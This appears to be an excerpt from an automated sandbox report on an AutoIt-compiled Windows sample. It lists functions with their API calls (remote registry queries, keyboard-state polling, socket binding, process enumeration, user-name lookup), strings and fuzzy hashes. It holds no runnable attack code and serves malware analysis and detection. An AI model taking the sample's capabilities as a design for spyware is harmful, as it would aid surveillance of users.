                                                      • Part of subcall function 0039D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039C00D,?,?), ref: 0039D314
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D350
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3C7
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3FD
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039C89D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0039C908
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039C92C
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0039C98B
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0039CA46
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0039CAB3
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0039CB48
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0039CB99
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0039CC42
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0039CCE1
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039CCEE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 3102970594-0
                                                    • Opcode ID: d47e17a0970501d031e41bb184f6cb6fa4574641fe7c5daa2fd9ff44928f5ccb
                                                    • Instruction ID: ffc4d040c5247067aa4b07124d9f36e043d4a9930e0cff63a1755b0bebce18de
                                                    • Opcode Fuzzy Hash: d47e17a0970501d031e41bb184f6cb6fa4574641fe7c5daa2fd9ff44928f5ccb
                                                    • Instruction Fuzzy Hash: 420260716142009FDB16DF24C895E2ABBE5EF48314F19849DF84ACF2A2DB31ED42CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0037A572
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 0037A5F3
                                                    • GetKeyState.USER32(000000A0), ref: 0037A60E
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 0037A628
                                                    • GetKeyState.USER32(000000A1), ref: 0037A63D
                                                    • GetAsyncKeyState.USER32(00000011), ref: 0037A655
                                                    • GetKeyState.USER32(00000011), ref: 0037A667
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0037A67F
                                                    • GetKeyState.USER32(00000012), ref: 0037A691
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 0037A6A9
                                                    • GetKeyState.USER32(0000005B), ref: 0037A6BB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 6fe40a3fe3ebc91e385a4e6c2a4982eebc45b2915b5524d9eed54893a6d3ed8e
                                                    • Instruction ID: aeac50aac8ebe1fea27ec5e1853c4ecfc8feb580588aadbe2dbbdac989aec757
                                                    • Opcode Fuzzy Hash: 6fe40a3fe3ebc91e385a4e6c2a4982eebc45b2915b5524d9eed54893a6d3ed8e
                                                    • Instruction Fuzzy Hash: 8E41A460908FC96AFF37876088043A9BEA06B96354F09C05DD5CA5A5C2DB9C99C8CB63
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00394089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32 ref: 003940D1
                                                    • CoUninitialize.OLE32 ref: 003940DC
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,003B0B44,?), ref: 00394136
                                                    • IIDFromString.OLE32(?,?), ref: 003941A9
                                                    • VariantInit.OLEAUT32(?), ref: 00394241
                                                    • VariantClear.OLEAUT32(?), ref: 00394293
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 636576611-1287834457
                                                    • Opcode ID: 7ec9e64963389ee6e5ddc00459431bf86d840a6a039b1721388adf8345157492
                                                    • Instruction ID: 7532c9bda4965228aeba597d967e6dcfe19481030003b72bd0306b9a857a2c64
                                                    • Opcode Fuzzy Hash: 7ec9e64963389ee6e5ddc00459431bf86d840a6a039b1721388adf8345157492
                                                    • Instruction Fuzzy Hash: 8F61A0712083119FCB12DF65D849F9ABBE8FF49714F100849F9859B291D770ED85CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038A488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0038A4D5
                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0038A5E8
                                                      • Part of subcall function 003841CE: GetInputState.USER32 ref: 00384225
                                                      • Part of subcall function 003841CE: PeekMessageW.USER32 ref: 003842C0
                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0038A505
                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0038A5D2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                    • String ID: *.*
                                                    • API String ID: 1972594611-438819550
                                                    • Opcode ID: d93ec1669b6ea30ff6eb540c13d141d7333ab36d197bfb783892b20bb120e6d6
                                                    • Instruction ID: b302b4c0e34b68febd3394c6e3658b1717e28ff17cc049ef2bcb80afafb11add
                                                    • Opcode Fuzzy Hash: d93ec1669b6ea30ff6eb540c13d141d7333ab36d197bfb783892b20bb120e6d6
                                                    • Instruction Fuzzy Hash: AC41717190030AAFDF16EFA4DC49AEEBBB8EF0A310F144097E445A7191D7349E84CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DefDlgProcW.USER32(?,?), ref: 003122EE
                                                    • GetSysColor.USER32(0000000F), ref: 003123C3
                                                    • SetBkColor.GDI32(?,00000000), ref: 003123D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Color$Proc
                                                    • String ID:
                                                    • API String ID: 929743424-0
                                                    • Opcode ID: 88ea79a1b6912419e604dd25792d81ee6a076c02f1975f2c0e5d8f6552b15c41
                                                    • Instruction ID: b221af4226dfc87f59d0ce757bbc116dd4bc5d2248e8b8007a1cad9e3a957e80
                                                    • Opcode Fuzzy Hash: 88ea79a1b6912419e604dd25792d81ee6a076c02f1975f2c0e5d8f6552b15c41
                                                    • Instruction Fuzzy Hash: A3815BF1204454BEE62F663D8C9CEFF154DDB4F341F120A09F512D99A1CB298EA6D632
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00392163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003939AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003939D7
                                                      • Part of subcall function 003939AB: _wcslen.LIBCMT ref: 003939F8
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003921BA
                                                    • WSAGetLastError.WSOCK32 ref: 003921E1
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00392238
                                                    • WSAGetLastError.WSOCK32 ref: 00392243
                                                    • closesocket.WSOCK32(00000000), ref: 00392272
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 1601658205-0
                                                    • Opcode ID: c28c8dc1371b05f89f51b2ddab4ff597ad1a6b3db1cdbfc68b7892f5774a111c
                                                    • Instruction ID: 546c4160e8065c7c470e39c0f85f9e9e87157b271b6e05ff900c8fb042399289
                                                    • Opcode Fuzzy Hash: c28c8dc1371b05f89f51b2ddab4ff597ad1a6b3db1cdbfc68b7892f5774a111c
                                                    • Instruction Fuzzy Hash: 2751C375600210AFDB16AF24C886F6A77E9AF09714F098048F956AF3D3C771ED418BE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A25A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: e6e6333d4fae502abde291cfd952b17e3e3f2c260e92c777e179409a6fcc39bf
                                                    • Instruction ID: ee13052d26c587e3849276f5b45883d02393624d8d94175202b054cfaae95726
                                                    • Opcode Fuzzy Hash: e6e6333d4fae502abde291cfd952b17e3e3f2c260e92c777e179409a6fcc39bf
                                                    • Instruction Fuzzy Hash: 5921E5317012509FD7168F1AC854B57BBD9FF97314F598068E84ACB261DB72EC42CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039AFDB Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0039B00B
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0039B019
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0039B0FB
                                                    • CloseHandle.KERNEL32(00000000), ref: 0039B10A
                                                      • Part of subcall function 0032E2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00354D4D,?), ref: 0032E30F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                    • String ID:
                                                    • API String ID: 1991900642-0
                                                    • Opcode ID: 8c7415af4991312ea84d007cd82f52af41e171bf5811913ab991b34610d8ee8a
                                                    • Instruction ID: ab9aa408c073003eaaaafe861bcf357b49cca4f4ea6f420c8da598b225340adf
                                                    • Opcode Fuzzy Hash: 8c7415af4991312ea84d007cd82f52af41e171bf5811913ab991b34610d8ee8a
                                                    • Instruction Fuzzy Hash: 5E517B75508310AFC715EF24D886AABBBE8FF88754F00491DF989DB251EB70D904CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036E5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0036E60A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID: X64
                                                    • API String ID: 2645101109-893830106
                                                    • Opcode ID: ea36817150db254eca74a2938e537a27a421f9fe7d5725ebc10c6863123ed815
                                                    • Instruction ID: 4a785b936329728324f6754452d50d7c5996d6f5edd71d9dfe6e6c22436399f0
                                                    • Opcode Fuzzy Hash: ea36817150db254eca74a2938e537a27a421f9fe7d5725ebc10c6863123ed815
                                                    • Instruction Fuzzy Hash: F3D0C9B481112DEACBA1CB90EC88DDD737CBB14304F104151F106A2400DB3495488B10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037EBB3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: 48e4bafab684083f53c6c49daf46e7b8f15c1afd08d06f7ef6a1aeb6de69b02d
                                                    • Instruction ID: 40d2d1769254b5c2c792501f18439947251a48d63b2a92094f2052a334768fdb
                                                    • Opcode Fuzzy Hash: 48e4bafab684083f53c6c49daf46e7b8f15c1afd08d06f7ef6a1aeb6de69b02d
                                                    • Instruction Fuzzy Hash: B6D05BB515C10078E43F4ABC4D1FF760E4CF30A751F4586D9B20BE5DA4E5DD9900A125
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039306E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 0039309B
                                                    • SystemParametersInfoW.USER32 ref: 003931C7
                                                    • SetRect.USER32 ref: 00393206
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00393216
                                                    • CreateWindowExW.USER32 ref: 0039325D
                                                    • GetClientRect.USER32 ref: 00393269
                                                    • CreateWindowExW.USER32 ref: 003932B2
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003932C1
                                                    • GetStockObject.GDI32(00000011), ref: 003932D1
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003932D5
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 003932E5
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003932EE
                                                    • DeleteDC.GDI32(00000000), ref: 003932F7
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00393323
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0039333A
                                                    • CreateWindowExW.USER32 ref: 0039337A
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0039338E
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0039339F
                                                    • CreateWindowExW.USER32 ref: 003933D4
                                                    • GetStockObject.GDI32(00000011), ref: 003933DF
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003933EA
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 003933F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 52f2c9cd358cce8bbad556bc36fc7622a6cd5c01d5fa13e83b4ba9ce87498100
                                                    • Instruction ID: b6fd738c3f1a9645f5f34f8213eee0815e1744729ef444c4e5f5bfc5a0bd3c68
                                                    • Opcode Fuzzy Hash: 52f2c9cd358cce8bbad556bc36fc7622a6cd5c01d5fa13e83b4ba9ce87498100
                                                    • Instruction Fuzzy Hash: 81B13CB5A40205AFEB15DF68DC89EAB7BADEB09710F004115F915AB2A0DB74AD40CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A0BA0 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 003A0C44
                                                    • _wcslen.LIBCMT ref: 003A0C7E
                                                    • _wcslen.LIBCMT ref: 003A0CE8
                                                    • _wcslen.LIBCMT ref: 003A0D50
                                                    • _wcslen.LIBCMT ref: 003A0DD4
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003A0E24
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003A0E63
                                                      • Part of subcall function 0032FD60: _wcslen.LIBCMT ref: 0032FD6B
                                                      • Part of subcall function 00372ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00372AE8
                                                      • Part of subcall function 00372ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00372B1A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 1103490817-719923060
                                                    • Opcode ID: 479528136f41a2b584d0b88fdaf7c04d35e31ff05a7463ef52ac738b2a8a70d7
                                                    • Instruction ID: 431f8987995723c4aec396219da1f14f24005c2c4febd973f64c7a4e12d1cad1
                                                    • Opcode Fuzzy Hash: 479528136f41a2b584d0b88fdaf7c04d35e31ff05a7463ef52ac738b2a8a70d7
                                                    • Instruction Fuzzy Hash: 61E1D1322143418FC71AEF28C44086AB7E6FF9A314F15896DF8969B7A1DB30ED45CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003124C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemParametersInfoW.USER32 ref: 0031259A
                                                    • GetSystemMetrics.USER32 ref: 003125A2
                                                    • SystemParametersInfoW.USER32 ref: 003125CD
                                                    • GetSystemMetrics.USER32 ref: 003125D5
                                                    • GetSystemMetrics.USER32 ref: 003125FA
                                                    • SetRect.USER32 ref: 00312617
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00312627
                                                    • CreateWindowExW.USER32 ref: 0031265A
                                                    • SetWindowLongW.USER32 ref: 0031266E
                                                    • GetClientRect.USER32 ref: 0031268C
                                                    • GetStockObject.GDI32(00000011), ref: 003126A8
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003126B3
                                                      • Part of subcall function 003119CD: GetCursorPos.USER32(?,?,00000000,00000000,?,003126C6,00000000,000000FF,?,?,?), ref: 003119E1
                                                      • Part of subcall function 003119CD: ScreenToClient.USER32 ref: 003119FE
                                                      • Part of subcall function 003119CD: GetAsyncKeyState.USER32(00000001), ref: 00311A23
                                                      • Part of subcall function 003119CD: GetAsyncKeyState.USER32(00000002), ref: 00311A3D
                                                    • SetTimer.USER32 ref: 003126DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 57b84302b0ead8b21369211c9d18d4e514c1be8370158004b7bb07c151e6d984
                                                    • Instruction ID: fb54e9eacb9f114ea21f22d237d7fb1c03caea1f81b9fc6ca737d827e5986f42
                                                    • Opcode Fuzzy Hash: 57b84302b0ead8b21369211c9d18d4e514c1be8370158004b7bb07c151e6d984
                                                    • Instruction Fuzzy Hash: 89B18C71A002099FDB1ADFA8CC85BEE7BB9EB49311F114219FE169B2E0D770D950CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

